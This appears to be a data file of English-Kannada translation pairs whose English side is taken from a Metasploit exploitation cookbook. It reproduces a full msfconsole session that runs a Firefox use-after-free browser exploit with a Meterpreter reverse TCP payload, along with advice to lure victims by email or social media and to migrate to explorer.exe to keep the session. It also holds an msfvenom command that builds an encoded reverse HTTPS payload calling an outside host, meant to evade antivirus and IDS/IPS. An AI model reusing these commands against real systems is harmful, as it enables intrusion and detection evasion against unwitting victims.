| {"en":"To exploit the target using this module, we first need to set the IP address and3. port of the host we will be serving the exploit on and the URI to use, then set the payload we want to execute on the target, and since we are using a reverse shell, we also need to specify the listening host IP address:","translation":"ಈ ಮಾಡ್ಯೂಲ್ ಬಳಸಿ ಗುರಿಯನ್ನು ಶೋಷಿಸಲು, ನಾವು ಮೊದಲು IP ವಿಳಾಸವನ್ನು ಹೊಂದಿಸಬೇಕಾಗಿದೆ ಮತ್ತು ನಾವು ಶೋಷಣೆಯನ್ನು ಒದಗಿಸುವ ಹೋಸ್ಟ್ನ ಪೋರ್ಟ್ ಮತ್ತು ಬಳಸಬೇಕಾದ URI ಅನ್ನು ಹೊಂದಿಸಬೇಕು, ನಂತರ ನಾವು ಗುರಿಯ ಮೇಲೆ ಕಾರ್ಯಗತಗೊಳಿಸಲು ಬಯಸುವ ಪೇಲೋಡ್ ಅನ್ನು ಹೊಂದಿಸಬೇಕು ಮತ್ತು ನಾವು ರಿವರ್ಸ್ ಶೆಲ್ ಅನ್ನು ಬಳಸುತ್ತಿರುವುದರಿಂದ, ನಾವು ಆಲಿಸುವ ಹೋಸ್ಟ್ IP ವಿಳಾಸವನ್ನು ಸಹ ನಿರ್ದಿಷ್ಟಪಡಿಸಬೇಕಾಗಿದೆ:","target_lang":"kn","domain":"technical","complexity":"complex"} | |
| {"en":"msf auxiliary(gather/browser_info) > use exploit/windows/browser/firefox_smil_uaf msf exploit(windows/browser/firefox_smil_uaf) > set SRVHOST 192.168.216.5 SRVHOST => 192.168.216.5 msf exploit(windows/browser/firefox_smil_uaf) > set SRVPORT 80 SRVPORT => 80 msf exploit(windows/browser/firefox_smil_uaf) > set URIPATH / URIPATH => / msf exploit(windows/browser/firefox_smil_uaf) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(windows/browser/firefox_smil_uaf) > set LHOST 192.168.216.5 LHOST => 192.168.216.5 msf exploit(windows/browser/firefox_smil_uaf) > exploit","translation":"msf auxiliary(gather/browser_info) > use exploit/windows/browser/firefox_smil_uaf msf exploit(windows/browser/firefox_smil_uaf) > set SRVHOST 192.168.216.5 SRVHOST => 192.168.216.5 msf exploit(windows/browser/firefox_smil_uaf) > set SRVPORT 80 SRVPORT => 80 msf exploit(windows/browser/firefox_smil_uaf) > set URIPATH / URIPATH => / msf exploit(windows/browser/firefox_smil_uaf) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(windows/browser/firefox_smil_uaf) > set LHOST 192.168.216.5 LHOST => 192.168.216.5 msf exploit(windows/browser/firefox_smil_uaf) > exploit","target_lang":"kn","domain":"technical","complexity":"complex"} | |
| {"en":"[*] Exploit running as background job 0. [*] Started reverse TCP handler on 192.168.216.5:4444 msf exploit(windows/browser/firefox_smil_uaf) > [*] Using URL: http://192.168.216.5:80/ [*] Server started.","translation":"[*] ಹಿನ್ನೆಲೆ ಕೆಲಸ 0 ಆಗಿ ಶೋಷಣೆ ಚಾಲನೆಯಲ್ಲಿದೆ. [*] 192.168.216.5:4444 ನಲ್ಲಿ ರಿವರ್ಸ್ TCP ಹ್ಯಾಂಡ್ಲರ್ ಪ್ರಾರಂಭವಾಯಿತು msf exploit(windows/browser/firefox_smil_uaf) > [*] URL ಅನ್ನು ಬಳಸುವುದು: http://192.168.216.5:80/ [*] ಸರ್ವರ್ ಪ್ರಾರಂಭವಾಯಿತು.","target_lang":"kn","domain":"technical","complexity":"complex"} | |
| {"en":"Now that we have everything set up, we will need the victim to browse to our site—this can be achieved using several means, email, social media, and so on When the victim accesses the URL, we should successfully exploit the use-after-4. free vulnerability and get a new session running in the context of the user that accesses the URL.","translation":"ನಾವು ಎಲ್ಲವನ್ನೂ ಹೊಂದಿಸಿದ ನಂತರ, ನಾವು ಬಲಿಪಶು ನಮ್ಮ ಸೈಟ್ಗೆ ಬ್ರೌಸ್ ಮಾಡಲು ಅಗತ್ಯವಿದೆ - ಇದನ್ನು ಹಲವಾರು ವಿಧಾನಗಳನ್ನು ಬಳಸಿ ಸಾಧಿಸಬಹುದು, ಇಮೇಲ್, ಸಾಮಾಜಿಕ ಮಾಧ್ಯಮ, ಇತ್ಯಾದಿ ಬಲಿಪಶು URL ಅನ್ನು ಪ್ರವೇಶಿಸಿದಾಗ, ನಾವು ಯಶಸ್ವಿಯಾಗಿ ಬಳಸಿದ ನಂತರ ಉಚಿತ ದೌರ್ಬಲ್ಯವನ್ನು ಬಳಸಿಕೊಳ್ಳಬೇಕು ಮತ್ತು URL ಅನ್ನು ಪ್ರವೇಶಿಸುವ ಬಳಕೆದಾರರ ಸಂದರ್ಭದಲ್ಲಿ ಹೊಸ ಸೆಷನ್ ಅನ್ನು ಪಡೆಯಬೇಕು.","target_lang":"kn","domain":"technical","complexity":"complex"} | |
| {"en":"Note that, to prevent us from losing the session if the user closes the browser, this module uses the post/windows/manage/priv_migrate post-exploitation module to migrate to the explorer.exe process.","translation":"ಬಳಕೆದಾರರು ಬ್ರೌಸರ್ ಅನ್ನು ಮುಚ್ಚಿದರೆ ಸೆಷನ್ ಕಳೆದುಕೊಳ್ಳುವುದನ್ನು ತಡೆಯಲು, ಈ ಮಾಡ್ಯೂಲ್ ಎಕ್ಸ್ಪ್ಲೋರರ್.exe ಪ್ರಕ್ರಿಯೆಗೆ ವಲಸೆ ಹೋಗಲು ಪೋಸ್ಟ್/ವಿಂಡೋಸ್/ನಿರ್ವಹಣೆ/priv_migrate ಪೋಸ್ಟ್-ಶೋಷಣೆ ಮಾಡ್ಯೂಲ್ ಅನ್ನು ಬಳಸುತ್ತದೆ ಎಂಬುದನ್ನು ಗಮನಿಸಿ.","target_lang":"kn","domain":"technical","complexity":"complex"} | |
| {"en":"Client-Side Exploitation and Antivirus BypassChapter 7 [ 264 ] Bypassing antivirus and IDS/IPS As time went by, and Metasploit became the tool to use for exploitation, security vendors started to detect and stop exploits from running.","translation":"ಕ್ಲೈಂಟ್-ಸೈಡ್ ಶೋಷಣೆ ಮತ್ತು ಆಂಟಿವೈರಸ್ ಬೈಪಾಸ್ ಅಧ್ಯಾಯ 7 [ 264 ] ಆಂಟಿವೈರಸ್ ಮತ್ತು IDS/IPS ಅನ್ನು ಬೈಪಾಸ್ ಮಾಡುವುದು ಕಾಲ ಕಳೆದಂತೆ, ಮತ್ತು ಮೆಟಾಸ್ಪ್ಲೋಯಿಟ್ ಶೋಷಣೆಗಾಗಿ ಬಳಸಬೇಕಾದ ಸಾಧನವಾಯಿತು, ಭದ್ರತಾ ಮಾರಾಟಗಾರರು ಶೋಷಣೆಗಳನ್ನು ಪತ್ತೆಹಚ್ಚಲು ಮತ್ತು ಚಾಲನೆಯಿಂದ ನಿಲ್ಲಿಸಲು ಪ್ರಾರಂಭಿಸಿದರು.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"One approach to bypassing these solutions is to combine the use of custom encoders and trusted certificates.","translation":"ಈ ಪರಿಹಾರಗಳನ್ನು ಬೈಪಾಸ್ ಮಾಡುವ ಒಂದು ವಿಧಾನವೆಂದರೆ ಕಸ್ಟಮ್ ಎನ್ಕೋಡರ್ಗಳು ಮತ್ತು ವಿಶ್ವಾಸಾರ್ಹ ಪ್ರಮಾಣಪತ್ರಗಳ ಬಳಕೆಯನ್ನು ಸಂಯೋಜಿಸುವುದು.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"How to do it... In this recipe, we will combine several bypass techniques in order to successfully bypass antivirus and IDS/IPS solutions.","translation":"ಅದನ್ನು ಹೇಗೆ ಮಾಡುವುದು... ಈ ಪಾಕವಿಧಾನದಲ್ಲಿ, ನಾವು ಆಂಟಿವೈರಸ್ ಮತ್ತು IDS/IPS ಪರಿಹಾರಗಳನ್ನು ಯಶಸ್ವಿಯಾಗಿ ಬೈಪಾಸ್ ಮಾಡಲು ಹಲವಾರು ಬೈಪಾಸ್ ತಂತ್ರಗಳನ್ನು ಸಂಯೋಜಿಸುತ್ತೇವೆ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"First, we will create the payload using the bf_xor custom encoder used in the1. previous chapter; this way we can ensure that the solution looking for the default encoders won't flag our payload as malware:","translation":"ಮೊದಲಿಗೆ, ನಾವು ಹಿಂದಿನ ಅಧ್ಯಾಯದಲ್ಲಿ ಬಳಸಲಾದ bf_xor ಕಸ್ಟಮ್ ಎನ್ಕೋಡರ್ ಅನ್ನು ಬಳಸಿಕೊಂಡು ಪೇಲೋಡ್ ಅನ್ನು ರಚಿಸುತ್ತೇವೆ; ಈ ರೀತಿಯಾಗಿ ಡೀಫಾಲ್ಟ್ ಎನ್ಕೋಡರ್ಗಳನ್ನು ಹುಡುಕುತ್ತಿರುವ ಪರಿಹಾರವು ನಮ್ಮ ಪೇಲೋಡ್ ಅನ್ನು ಮಾಲ್ವೇರ್ ಎಂದು ಫ್ಲ್ಯಾಗ್ ಮಾಡುವುದಿಲ್ಲ ಎಂದು ನಾವು ಖಚಿತಪಡಿಸಿಕೊಳ್ಳಬಹುದು:","target_lang":"kn","domain":"technical","complexity":"complex"} | |
| {"en":"root@Metasploit:~# msfvenom -p windows/meterpreter/reverse_winhttps LHOST=zinitiative.com LPORT=443 HandlerSSLCert=./unified.pem StagerVerifySSLCert=true -f exe -e x86/bf_xor -o bypass.exe No platform was selected, choosing Msf::Module::Platform::Windows from the payload No Arch selected, selecting Arch: x86 from the payload Found 1 compatible encoders Attempting to encode payload with 1 iterations of x86/bf_xor x86/bf_xor succeeded with size 1259 (iteration=0) x86/bf_xor chosen with final size 1259 Payload size: 1259 bytes Final size of exe file: 73802 bytes Saved as: bypass.exe","translation":"root@Metasploit:~# msfvenom -p windows/meterpreter/reverse_winhttps LHOST=zinitiative.com LPORT=443 HandlerSSLCert=./unified.pem StagerVerifySSLCert=true -f exe -e x86/bf_xor -o bypass.exe ಪೇಲೋಡ್ನಿಂದ Msf::Module::Platform::Windows ಅನ್ನು ಆಯ್ಕೆ ಮಾಡಲಾಗುತ್ತಿದೆ ಪ್ಲಾಟ್ಫಾರ್ಮ್ ಅನ್ನು ಆಯ್ಕೆ ಮಾಡಲಾಗಿಲ್ಲ ಆರ್ಚ್ ಅನ್ನು ಆಯ್ಕೆ ಮಾಡಲಾಗಿಲ್ಲ, ಪೇಲೋಡ್ನಿಂದ ಆರ್ಚ್: x86 ಅನ್ನು ಆಯ್ಕೆ ಮಾಡಲಾಗುತ್ತಿದೆ 1 ಹೊಂದಾಣಿಕೆಯ ಎನ್ಕೋಡರ್ಗಳು ಕಂಡುಬಂದಿವೆ x86/bf_xor ನ 1 ಪುನರಾವರ್ತನೆಗಳೊಂದಿಗೆ ಪೇಲೋಡ್ ಅನ್ನು ಎನ್ಕೋಡ್ ಮಾಡಲು ಪ್ರಯತ್ನಿಸಲಾಗುತ್ತಿದೆ x86/bf_xor ಗಾತ್ರದೊಂದಿಗೆ ಯಶಸ್ವಿಯಾಗಿದೆ 1259 (ಪುನರಾವರ್ತನೆ=0) x86/bf_xor ಅಂತಿಮ ಗಾತ್ರದೊಂದಿಗೆ ಆಯ್ಕೆಮಾಡಲಾಗಿದೆ 1259 ಪೇಲೋಡ್ ಗಾತ್ರ: 1259 ಬೈಟ್ಗಳು ಎಕ್ಸಿ ಫೈಲ್ನ ಅಂತಿಮ ಗಾತ್ರ: 73802 ಬೈಟ್ಗಳು ಹೀಗೆ ಉಳಿಸಲಾಗಿದೆ: bypass.exe","target_lang":"kn","domain":"technical","complexity":"complex"} |